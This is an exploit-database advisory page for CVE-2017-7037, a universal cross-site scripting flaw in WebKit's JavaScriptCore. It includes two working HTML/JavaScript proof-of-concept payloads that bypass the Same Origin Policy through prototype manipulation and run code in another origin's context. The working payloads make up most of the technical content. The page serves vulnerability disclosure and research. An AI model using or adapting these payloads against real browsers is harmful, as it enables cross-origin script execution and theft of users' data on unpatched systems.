WebKit JSC JSObject::putInlineSlow & JSValue::putToPrimitive XSS

2017.07.25
Credit: lokihardt
Risk: High
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive CVE-2017-7037 JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called. The PoC shows to call a setter of another origin's object. PoC 1 - JSValue::putToPrimitive: <body> <script> let f = document.body.appendChild(document.createElement('iframe')); let loc = f.contentWindow.location; f.onload = () => { let a = 1.2; a.__proto__.__proto__ = f.contentWindow; a['test'] = {toString: function () { arguments.callee.caller.constructor('alert(location)')(); }}; }; f.src = 'data:text/html,' + `<iframe></iframe><script> Object.prototype.__defineSetter__('test', v => { 'a' + v; }); </scrip` + `t>`; </script> </body> PoC 2 - JSObject::putInlineSlow: <body> <script> let f = document.body.appendChild(document.createElement('iframe')); let loc = f.contentWindow.location; f.onload = () => { let a = { __proto__: f.contentWindow }; a['test'] = {toString: function () { arguments.callee.caller.constructor('alert(location)')(); }}; }; f.src = 'data:text/html,' + `<iframe></iframe><script> Object.prototype.__defineSetter__('test', v => { 'a' + v; }); </scrip` + `t>`; </script> </body> This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top